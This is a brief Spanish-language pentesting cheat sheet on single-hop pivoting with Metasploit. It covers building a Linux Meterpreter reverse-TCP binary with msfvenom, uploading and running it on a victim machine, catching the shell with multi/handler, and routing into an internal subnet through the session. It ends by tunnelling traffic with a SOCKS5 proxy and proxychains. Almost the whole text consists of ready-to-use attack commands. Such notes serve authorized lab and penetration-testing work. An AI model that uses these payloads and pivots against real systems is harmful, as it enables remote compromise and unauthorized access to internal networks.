Single Pivot

Meterpreter Shell

Crear consola meterpreter:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.4 LPORT=4434 -f ELF -o metaprieta

Subimos ese binario metaprieta al sistema victima.

Iniciamos listener de meterpreter en metasploit:

msfconsole
use /multi/handler
options
set LHOST 192.168.20.4
set LPORT 4434
set payload linux/x86/meterpreter/reverse_tcp
run

Ejecutamos binario que subimos a la máquina victima (le damos permisos de ejecución).

Ya obtendriamos nuestra shell meterpreter.

Routing

Obtenemos la interfaz de red a la cual queremos enrutar:

ipconfig
(CTRL^Z para enviar la tarea a segundo plano)
Background session 2? [y/N] (le decimos: y)

Enrutamos:

route add IP MASK SESSION

route add 172.18.100.17 255.255.255.0 2

O dentro de la misma sesión:

sessions -i 2
run post/multi/manage/autoroute

SOCKS

use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1111
set VERSION 5
run

Proxychains

Editamos el archivo y al final agregamos el tunel:

cat /etc/proxychains.conf
...
socks5 127.0.0.1 1111

Last updated